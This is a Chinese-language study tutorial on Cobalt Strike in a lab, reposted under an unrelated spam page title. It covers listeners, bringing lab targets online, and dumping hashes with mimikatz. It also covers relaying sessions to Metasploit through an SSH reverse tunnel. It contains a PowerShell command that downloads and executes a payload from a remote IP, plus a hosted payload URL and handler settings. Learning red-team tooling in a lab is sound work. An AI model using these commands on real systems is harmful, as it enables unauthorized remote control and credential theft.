当前位置: 首页 > news >正文

经典的网站设计自适应网站开发框架

news 2025/11/6 9:23:37
经典的网站设计,自适应网站开发框架,建设一个机械公司网站多少钱,wordpress安装主题要多久一、快捷工具栏 3、需要创建监听器,才能让靶机上线,连接我们公网服务端上去开启的帧监听端口,做任何操作 都是通过服务器的IP地址去连接靶机,去和靶机进行文件stage的一个传输和交互。这里推荐把cs 放到公网上边,比较…

一、快捷工具栏

3、需要创建监听器,才能让靶机上线,连接我们公网服务端上去开启的帧监听端口,做任何操作

都是通过服务器的IP地址去连接靶机,去和靶机进行文件stage的一个传输和交互。这里推荐把cs

放到公网上边,比较方便让靶机上线。

4-6单个视图

11、payload分为stage和stageless(相当于php大马,拥有所有的功能,包括meterpreter,很大,不

需其他的管理器就能实现完全的交互,网络环境比较差的时候可以使用它,大并且容易查杀)

12、已淘汰

13、生成恶意Office宏攻击,嵌入恶意宏攻击。

14、建立web_delivery是在内存上执行恶意代码,不会再服务器上留下文件的。

查看进程:ps aux | grep teamserver

kali -9 进程  干掉进程

sudo yum install java-11-openjdk-devel(cs4.3版本java11环境)

sudo yum list installed | grep java(查看已安装java)

sudo alternatives --config java (切换环境)

java -version(查看版本)

export JAVA_HOME=$(dirname $(dirname $(readlink -f $(which java))))

echo $JAVA_HOME     设置环境变量(此两条命令直接在命令行执行)

sudo lsof -i :50050     查看端口状态

./msg  用户名  信息(发送给指定用户)

二、创建监听器listener

点击Cobalt strike——监听器——add

获取靶机上线stager,任何靶机上线都是通过服务端

查看端口是否在线  netstat -ano |grep 8080

三、学习:cobaltrike实战演示1:

创建完监听器后,想让靶机上线(那就攻击靶机)

云服务器用作实验的话,如果安全组不需要特定要求,直接放通全部

靶机上线操作:

选择前边设置的监听器和方法(这里的方法我是用的是powershell)

选择文件保存位置,这里我保存到桌面为了方便(这个是windows10做的客户端)

之后需要再开启一个端口,让靶机可以下载这个文件,使用web-drive-by的host file,选择刚刚生

成的文件

复制下边内容

http://39.99.136.38:9090/download/file.ext

在靶机里边执行  (这使用的是windows7 64位操作系统)

此时靶机已上线

上线之后可以靶机进行一系列的控制

这里是默认60秒的心跳间隔(真实环境可以不修改,容易被ids查杀)

①设置时间间隔

②在beacon中  sleep  2亦可以设置

靶机想要下线就把进程(process)关掉,在这个界面退出会再次上线

shell ipconfig 命令

help 可以查看我们能执行的一些命令

重要模块

②转移③内存中获取密码④不建议开启(vps带宽较小,很卡)

screenshot截屏

在视图界面可以查看

亦可以端口扫描和查看进程

四、学习:cobaltrike实战演示2:

其他的监听器和attack进行一个主机上线,如下:

设置端口,监听器(同样如上执行,可以上线)

删除我们开启的东西

①mamager   web server

②attacks ——web-driver-by ——manager

这如果在设置的时候没有copy,这里也是可以copy的

想关掉,直接选中,点击kill

端口扫描完可做如下操作:(三个视图模式)

脚本可以github搜,选择一个路径导入cna,成功会显示ready(√)

五、学习:cobaltrike攻击流程:

拿root和system权限

选择监听器和利用脚本

自动打出去

两个用户是不一样的

①hashdump命令或者②右击——执行——hash(读取用户哈希值)或者③右键run mimikatz's

此时在任务管理器运行着powwershell.exe把它杀死了就没了(可以利用msf做进程迁移)

先右击exit和remove把靶机移除掉(新操作)(因为直接remove会在自动上线)

比较安全

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://35.12.32.156:9091/a'))"复制此代码到靶机去执行

此处是dvwa靶场

此时靶机又上线了

靶机上线方法:

①命令执行②文件上传,上传webshell(工具执行连接),无报错有权限执行,靶机即可上线(如果

cs是在内网中的,确定靶机能够连到cs)

六、学习:cs和msf联动

1、cs联动msf之socks代理(访问内网或者无法直接访问的服务器就需要建立代理)

2、cs联动msf之外部监听器

3、练习

1、介绍:

cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各

类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。

meterpreter的功能十分强大,模块非常多,攻击,辅助,编码等等,cs进行团队合作,进行主机

的上线和smb的横向移动(内网管控平台)

环境搭建条件:

①cs客户端一台windows10操作系统,一台centos7操作系统(或者kali操作系统也行)

②一台云服务器作为cs服务器(公网上vps)

③一台windows7(可联网),一台windows2012(不联网)

操作步骤:

①socks  端口(如 socks  1234)

可以在vps查看(netstat -ano|grep 1234)是否是监听状态

如何连接代理(代理是对服务端的,客户端只是连接服务器,所有的操作都是在服务端即vps操作

的)

复制上述命令转到msf中执行

此时整个msf就被代理到了1234端口,此时进行辅助端口扫描

非常慢

kali中操作

在文件中写入如下内容保存

此时还ping不了(ping在tcp/ip上一层(icmp)不能对ping代理转发,namp可以进行no ping 扫

描)

此时会很慢(因为走代理)

虚拟机——物理网卡——运营商交换机——路由——vps服务器(此时就可扫描重要端口,不全

扫)

结果如下:

2、学习:cs联动msf之外部监听器

①创建一个新的linstener

转移时会开

把system的sesion发给metetpreter

kali中

将cs服务器的session发送到cs客户端也就是meterpreter(kali这一端)

外网ping不通内网(即cs服务器无法通cs客户端)做代理转发

保存退出

重启生效(有隧道转发功能)

执行此命令就可代理转发

此时内网的8085端口和vps的8085端口就通了(去看拓扑图)

选择上线的主机——右键span转移——选择监听器——外部的http8085 

拿到meterpreter

3、实操:操作步骤:

这里是提权一下后的ssystem权限的用户

①在vps中    vi  /etc/ssh/sshd_config(sshd_config是服务端配置文件)

②AllowTcpForwarding yes

GatewayPorts yes

TCPKeepAlive yes

PasswordAuthentication   yes

③systemctl restart sshd.service或者systemctl restart sshd(这样才有隧道转发的功能)

④回到本地的 kali 中,通过 ssh 隧道做转发

创建ssh隧道常用的参数:

-C:压缩传输,提供传输速度

-f :将ssh传输转入后台执行,不占用当前的shell

-N:建立静默连接(建立了连接,但是看不到具体会话)

-g:允许远程主机连接本地用于转发的端口

-L:本地端口转发

-R:远程端口转发

-D:动态转发

-P指定ssh端口

⑤命令执行:ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root@119.xx.xx.xx -p 22

含义解释:通过 119.xx.xx.xx 机器把外部的 8085 端口上的流量转到本地192.168.129.139 的 8085

端口上,而本地的 8085 端口上跑的又的监听器,所以,最终才造成 meterpreter本地上线的效

果。

⑥netstat -anltup 查看正在工作的端口

⑦netstat -tulnp |grep 8085查看服务器是否开启8085端口

此处有错误可以查杀pid  kill  pid即可(ssh)

⑧创建一个新的监听器

⑨在kali中启用msfconsole,设置参数

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost  192.168.129.139

set lport 9999

show options

run

⑩ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root@119.xx.xx.xx -p 22

最好检查一下是否设置成功:netstat -anltup(没有问题做如下操作)

等待stage发送

此时拿到了meterpreter(这个不知道是抽了什么风,重启虚拟机之后,我搞了两次才出来,多次

尝试)比较卡,此时可以拿shell(如果显示乱码  chcp 65001),进程迁移,exit退出

一、快捷工具栏

二、创建监听器listener

三、学习:cobaltrike实战演示1:

四、学习:cobaltrike实战演示2:

五、学习:cobaltrike攻击流程:

六、学习:cs和msf联动

1、介绍:

2、学习:cs联动msf之外部监听器

3、实操:操作步骤:

http://www.yayakq.cn/news/284020/

相关文章:

  • 网站开发的出路深圳网站设计 建设元
  • 广州10大网站服务品牌自己做的网站如何包装
  • 怎么选择手机网站建设广告设计服务
  • 网站备案负责人 更换网站邮箱配置
  • 网页设计与网站建设期末考试做视频采集网站犯法
  • 中国最大的网站建设公司中国建设银行官企业网站
  • 广州做网站星珀郑州网站制作服务
  • 广西网站建设哪家强浙江外发加工网
  • 织梦(dedecms)怎么修改后台网站默认"织梦内容管理系统"标题好的app设计网站
  • 深圳企业网站seo小程序源码提取工具
  • 科技园区建设网站的意义建一个网站需要多少费用
  • 福永网站建设多少钱漳州专业网站建设价格
  • 响应式网站模版下载wordpress文本插件
  • 马鞍山钢铁建设集团有限公司网站鸿扬家装网站建设
  • 哈尔滨开发网站wordpress固定链接文章别名
  • 网站部兼容ie6移动互联网技术学什么
  • 台州网站制作公司内蒙古网站建设电话
  • 商丘做网站优化门户资源分享网站模板
  • 网站的建设特色券多多是谁做的网站
  • 自建网站过程站长工具seo综合查询排名
  • cvm可以做网站服务器吗wordpress设置icon
  • 如何利用个人nas做网站一帘幽梦紫菱做的网站
  • 网站结构分析具体分析内容十大接单推广平台
  • 代做论文网站一个虚拟主机可以做两个网站吧
  • 网站域名续费沈阳搜索排名公司
  • 天津个人做网站中山网站建设文化信息
  • 网络营销推广主要做什么?有哪些方法和技巧?怎么把做的网站优化到百度
  • 自己做的网站怎么上传文章平面设计到底要学什么
  • 网站建设介绍文字网站制作建设模板
  • 网站建设交流网站建设错误代码50019